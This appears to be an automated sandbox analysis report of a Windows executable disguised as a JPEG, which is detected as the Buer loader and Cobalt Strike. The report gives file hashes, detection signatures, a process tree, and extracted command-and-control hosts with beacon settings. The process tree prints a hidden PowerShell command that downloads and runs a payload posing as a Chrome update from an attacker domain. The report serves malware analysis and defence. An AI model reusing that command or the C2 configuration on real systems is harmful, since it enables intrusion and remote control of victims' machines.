Overview

overview

10

Static

static

1

Test1

windows10_x64

10

Resubmissions

12-02-2021 14:19

210212-d2eq66jkpe 10

12-02-2021 13:05

210212-43tc7en5xn 10

11-02-2021 21:45

210211-9zwb32kx8e 10

Analysis

  • max time kernel
    1800s
  • max time network
    1800s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    12-02-2021 14:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SCD10093264.jpg.exe

  • Size

    116KB

  • MD5

    69819de123d7b83d5881932d706841f5

  • SHA1

    27fe7625cb44c9870fdaf810ec42cb02a0191c86

  • SHA256

    650750b450fd881501aa5a879696e9d61e8fcbbad479ce37b0a2bb081d73c209

  • SHA512

    fdd8578698fbcd278ee0c6820d57b834fd20a9172d8652ddbfd02b12b8f8f63845af01401838ef9b8c342fab919c74da53e4062271c157eb5bfa67a22ec9b907

Score
10/10
buercobaltstrikebackdoordiscoveryloadertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://wieubfavbrgaxyaadf.com:80/GoogleUpdate/Chrome/v12.142.3412/ChromeUpdate.exe

Extracted

Family

buer

C2

antipublicwestbank.com

Extracted

Family

cobaltstrike

C2

http://wieubfavbrgaxyaadf.com:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

http://213.252.245.98:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books
Attributes
  • access_type

    512

  • beacon_type

    2048

  • create_remote_thread

    0

  • day

    0

  • dns_idle

    0

  • dns_sleep

    0

  • host

    wieubfavbrgaxyaadf.com,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books,213.252.245.98,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

  • http_header1

    AAAACgAAAAtBY2NlcHQ6ICovKgAAABAAAAAUSG9zdDogd3d3LmFtYXpvbi5jb20AAAAHAAAAAAAAAAMAAAACAAAADnNlc3Npb24tdG9rZW49AAAAAgAAAAxza2luPW5vc2tpbjsAAAABAAAALGNzbS1oaXQ9cy0yNEtVMTFCQjgyUlpTWUdKM0JES3wxNDE5ODk5MDEyOTk2AAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • http_header2

    AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAQAAAAFEhvc3Q6IHd3dy5hbWF6b24uY29tAAAACQAAAApzej0xNjB4NjAwAAAACQAAABFvZT1vZT1JU08tODg1OS0xOwAAAAcAAAAAAAAABQAAAAJzbgAAAAkAAAAGcz0zNzE3AAAACQAAACJkY19yZWY9aHR0cCUzQSUyRiUyRnd3dy5hbWF6b24uY29tAAAABwAAAAEAAAADAAAABAAAAAAAAA==

  • http_method1

    GET

  • http_method2

    POST

  • injection_process

  • jitter

    0

  • maxdns

    255

  • month

    0

  • pipe_name

  • polling_time

    5000

  • port_number

    443

  • proxy_password

  • proxy_server

  • proxy_username

  • sc_process32

    %windir%\syswow64\rundll32.exe

  • sc_process64

    %windir%\sysnative\rundll32.exe

  • state_machine

    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCYd1oQf060FSdDXzjBJqdlpV8YWyEYknN6Z9OBGmUfGC658UlUamK8rmhpR2H5ifIBvJq1FFRmC1P0KRYvvr731B3yvjDDiQR8z4PvUaIroO1g/i6BZZfoJRGl+LlUHFxzg+knc+irsSpjerv2BcnkZk3ajwFA2i/E6E2UtsWVHQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • unknown1

    4096

  • unknown2

    AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • unknown3

    0

  • unknown4

    0

  • unknown5

    2.018915346e+09

  • uri

    /N4215/adj/amzn.us.sr.aps

  • user_agent

    Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

  • year

    0

Extracted

Family

cobaltstrike

C2

http://wieubfavbrgaxyaadf.com:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

http://213.252.245.98:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books
Attributes
  • access_type

    512

  • beacon_type

    2048

  • create_remote_thread

    0

  • day

    0

  • dns_idle

    0

  • dns_sleep

    0

  • host

    wieubfavbrgaxyaadf.com,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books,213.252.245.98,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

  • http_header1

    AAAACgAAAAtBY2NlcHQ6ICovKgAAABAAAAAUSG9zdDogd3d3LmFtYXpvbi5jb20AAAAHAAAAAAAAAAMAAAACAAAADnNlc3Npb24tdG9rZW49AAAAAgAAAAxza2luPW5vc2tpbjsAAAABAAAALGNzbS1oaXQ9cy0yNEtVMTFCQjgyUlpTWUdKM0JES3wxNDE5ODk5MDEyOTk2AAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • http_header2

    AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAQAAAAFEhvc3Q6IHd3dy5hbWF6b24uY29tAAAACQAAAApzej0xNjB4NjAwAAAACQAAABFvZT1vZT1JU08tODg1OS0xOwAAAAcAAAAAAAAABQAAAAJzbgAAAAkAAAAGcz0zNzE3AAAACQAAACJkY19yZWY9aHR0cCUzQSUyRiUyRnd3dy5hbWF6b24uY29tAAAABwAAAAEAAAADAAAABAAAAAAAAA==

  • http_method1

    GET

  • http_method2

    POST

  • injection_process

  • jitter

    0

  • maxdns

    255

  • month

    0

  • pipe_name

  • polling_time

    5000

  • port_number

    443

  • proxy_password

  • proxy_server

  • proxy_username

  • sc_process32

    %windir%\syswow64\rundll32.exe

  • sc_process64

    %windir%\sysnative\rundll32.exe

  • state_machine

    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCYd1oQf060FSdDXzjBJqdlpV8YWyEYknN6Z9OBGmUfGC658UlUamK8rmhpR2H5ifIBvJq1FFRmC1P0KRYvvr731B3yvjDDiQR8z4PvUaIroO1g/i6BZZfoJRGl+LlUHFxzg+knc+irsSpjerv2BcnkZk3ajwFA2i/E6E2UtsWVHQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • unknown1

    4096

  • unknown2

    AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • unknown3

    0

  • unknown4

    0

  • unknown5

    2.018915346e+09

  • uri

    /N4215/adj/amzn.us.sr.aps

  • user_agent

    Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

  • year

    0

Signatures

  • Buer

    Buer is a new modular loader first seen in August 2019.

    loaderbuer
  • Cobaltstrike

    Detected malicious payload which is part of Cobaltstrike.

    trojanbackdoorcobaltstrike
  • Buer Loader 1 IoCs

    Detects Buer loader in memory or disk.

  • Blocklisted process makes network request 64 IoCs
  • Loads dropped DLL 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 12 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 50 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:632
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2396
    • C:\Windows\system32\rundll32.exe
      C:\Windows\system32\rundll32.exe
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3136
    • C:\Windows\system32\rundll32.exe
      C:\Windows\system32\rundll32.exe
      2⤵
        PID:3856
      • C:\Windows\system32\rundll32.exe
        C:\Windows\system32\rundll32.exe
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1088
      • C:\Windows\system32\rundll32.exe
        C:\Windows\system32\rundll32.exe
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1836
      • C:\Windows\system32\rundll32.exe
        C:\Windows\system32\rundll32.exe
        2⤵
          PID:3284
        • C:\Windows\system32\rundll32.exe
          C:\Windows\system32\rundll32.exe
          2⤵
            PID:1112
          • C:\Windows\system32\rundll32.exe
            C:\Windows\system32\rundll32.exe
            2⤵
              PID:2888
            • C:\Windows\system32\rundll32.exe
              C:\Windows\system32\rundll32.exe
              2⤵
                PID:1516
              • C:\Windows\system32\rundll32.exe
                C:\Windows\system32\rundll32.exe
                2⤵
                  PID:4780
                • C:\Windows\system32\rundll32.exe
                  C:\Windows\system32\rundll32.exe
                  2⤵
                    PID:1624
                  • C:\Windows\system32\rundll32.exe
                    C:\Windows\system32\rundll32.exe
                    2⤵
                      PID:5800
                  • C:\Users\Admin\AppData\Local\Temp\SCD10093264.jpg.exe
                    "C:\Users\Admin\AppData\Local\Temp\SCD10093264.jpg.exe"
                    1⤵
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of WriteProcessMemory
                    PID:3992
                    • C:\Users\Admin\AppData\Local\Temp\SCD10093264.jpg.exe
                      "C:\Users\Admin\AppData\Local\Temp\SCD10093264.jpg.exe"
                      2⤵
                      • Enumerates connected drives
                      • Suspicious use of WriteProcessMemory
                      PID:3452
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" ('http://wieubfavbrgaxyaadf.com:80/GoogleUpdate/Chrome/v12.142.3412/ChromeUpdate.exe'))"
                        3⤵
                          PID:3980
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://wieubfavbrgaxyaadf.com:80/GoogleUpdate/Chrome/v12.142.3412/ChromeUpdate.exe'))"
                          3⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4012
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://wieubfavbrgaxyaadf.com:80/GoogleUpdate/Chrome/v12.142.3412/ChromeUpdate.exe'))"
                            4⤵
                            • Blocklisted process makes network request
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3880
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 3452 -s 20792
                          3⤵
                          • Program crash
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:816

                    Network

                    MITRE ATT&CK Enterprise v6

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • memory/632-50-0x00000292305E0000-0x00000292305E1000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/816-29-0x0000000004350000-0x0000000004351000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/1088-47-0x00000180D8950000-0x00000180D8965000-memory.dmp

                      Filesize

                      84KB

                      Download

                    • memory/1088-49-0x00000180D8A50000-0x00000180D8A69000-memory.dmp

                      Filesize

                      100KB

                      Download

                    • memory/1112-60-0x000002477B0F0000-0x000002477B10B000-memory.dmp

                      Filesize

                      108KB

                      Download

                    • memory/1112-58-0x000002477AFF0000-0x000002477B007000-memory.dmp

                      Filesize

                      92KB

                      Download

                    • memory/1516-64-0x0000027D51360000-0x0000027D51377000-memory.dmp

                      Filesize

                      92KB

                      Download

                    • memory/1516-66-0x0000027D51560000-0x0000027D5157B000-memory.dmp

                      Filesize

                      108KB

                      Download

                    • memory/1624-73-0x0000020B75A40000-0x0000020B75A5B000-memory.dmp

                      Filesize

                      108KB

                      Download

                    • memory/1624-71-0x0000020B75840000-0x0000020B75857000-memory.dmp

                      Filesize

                      92KB

                      Download

                    • memory/1836-52-0x000001F19C010000-0x000001F19C0C8000-memory.dmp

                      Filesize

                      736KB

                      Download

                    • memory/1836-54-0x000001F19C370000-0x000001F19C42D000-memory.dmp

                      Filesize

                      756KB

                      Download

                    • memory/2396-28-0x0000018A1F590000-0x0000018A1F5DC000-memory.dmp

                      Filesize

                      304KB

                      Download

                    • memory/2396-25-0x00000000003B0000-0x00000000003F0000-memory.dmp

                      Filesize

                      256KB

                      Download

                    • memory/2888-61-0x00000128F14F0000-0x00000128F1507000-memory.dmp

                      Filesize

                      92KB

                      Download

                    • memory/2888-63-0x00000128F16F0000-0x00000128F170B000-memory.dmp

                      Filesize

                      108KB

                      Download

                    • memory/3136-32-0x00000227FFE40000-0x00000227FFE66000-memory.dmp

                      Filesize

                      152KB

                      Download

                    • memory/3136-30-0x00000227FFC30000-0x00000227FFC51000-memory.dmp

                      Filesize

                      132KB

                      Download

                    • memory/3136-33-0x00007FFC34BE0000-0x00007FFC35580000-memory.dmp

                      Filesize

                      9.6MB

                      Download

                    • memory/3136-34-0x0000022780510000-0x0000022780512000-memory.dmp

                      Filesize

                      8KB

                      Download

                    • memory/3136-35-0x000002279A7E0000-0x000002279A7E5000-memory.dmp

                      Filesize

                      20KB

                      Download

                    • memory/3136-36-0x0000022780514000-0x0000022780517000-memory.dmp

                      Filesize

                      12KB

                      Download

                    • memory/3136-37-0x0000022780519000-0x000002278051D000-memory.dmp

                      Filesize

                      16KB

                      Download

                    • memory/3284-55-0x000001AE2A7D0000-0x000001AE2A7E7000-memory.dmp

                      Filesize

                      92KB

                      Download

                    • memory/3284-57-0x000001AE2A8D0000-0x000001AE2A8EB000-memory.dmp

                      Filesize

                      108KB

                      Download

                    • memory/3452-4-0x0000000040000000-0x000000004000A000-memory.dmp

                      Filesize

                      40KB

                      Download

                    • memory/3856-38-0x0000026EBFE60000-0x0000026EBFE81000-memory.dmp

                      Filesize

                      132KB

                      Download

                    • memory/3856-41-0x00007FFC34BE0000-0x00007FFC35580000-memory.dmp

                      Filesize

                      9.6MB

                      Download

                    • memory/3856-42-0x0000026EC0070000-0x0000026EC0096000-memory.dmp

                      Filesize

                      152KB

                      Download

                    • memory/3856-43-0x0000026EC0620000-0x0000026EC0622000-memory.dmp

                      Filesize

                      8KB

                      Download

                    • memory/3856-44-0x0000026EC0624000-0x0000026EC0627000-memory.dmp

                      Filesize

                      12KB

                      Download

                    • memory/3856-45-0x0000026EDA8F0000-0x0000026EDA8F5000-memory.dmp

                      Filesize

                      20KB

                      Download

                    • memory/3856-46-0x0000026EC0629000-0x0000026EC062D000-memory.dmp

                      Filesize

                      16KB

                      Download

                    • memory/3880-17-0x0000000007A30000-0x0000000007A31000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3880-13-0x0000000007260000-0x0000000007261000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3880-23-0x0000000009460000-0x0000000009493000-memory.dmp

                      Filesize

                      204KB

                      Download

                    • memory/3880-24-0x00000000094A0000-0x00000000094DD000-memory.dmp

                      Filesize

                      244KB

                      Download

                    • memory/3880-22-0x0000000006DA3000-0x0000000006DA4000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3880-21-0x0000000008F10000-0x0000000008F11000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3880-20-0x0000000009990000-0x0000000009991000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3880-19-0x0000000008190000-0x0000000008191000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3880-18-0x0000000008450000-0x0000000008451000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3880-26-0x0000000000A00000-0x0000000000A01000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3880-16-0x0000000007AF0000-0x0000000007AF1000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3880-15-0x0000000007A80000-0x0000000007A81000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3880-14-0x00000000071B0000-0x00000000071B1000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3880-27-0x0000000000A10000-0x0000000000A11000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3880-11-0x0000000006DA0000-0x0000000006DA1000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3880-12-0x0000000006DA2000-0x0000000006DA3000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3880-10-0x00000000073E0000-0x00000000073E1000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3880-9-0x0000000004A30000-0x0000000004A31000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3880-8-0x0000000072920000-0x000000007300E000-memory.dmp

                      Filesize

                      6.9MB

                      Download

                    • memory/4780-70-0x000001F6535A0000-0x000001F6535BB000-memory.dmp

                      Filesize

                      108KB

                      Download

                    • memory/4780-68-0x000001F6534A0000-0x000001F6534B7000-memory.dmp

                      Filesize

                      92KB

                      Download

                    • memory/5800-74-0x000001A036200000-0x000001A036231000-memory.dmp

                      Filesize

                      196KB

                      Download

                    • memory/5800-76-0x000001A036320000-0x000001A036355000-memory.dmp

                      Filesize

                      212KB

                      Download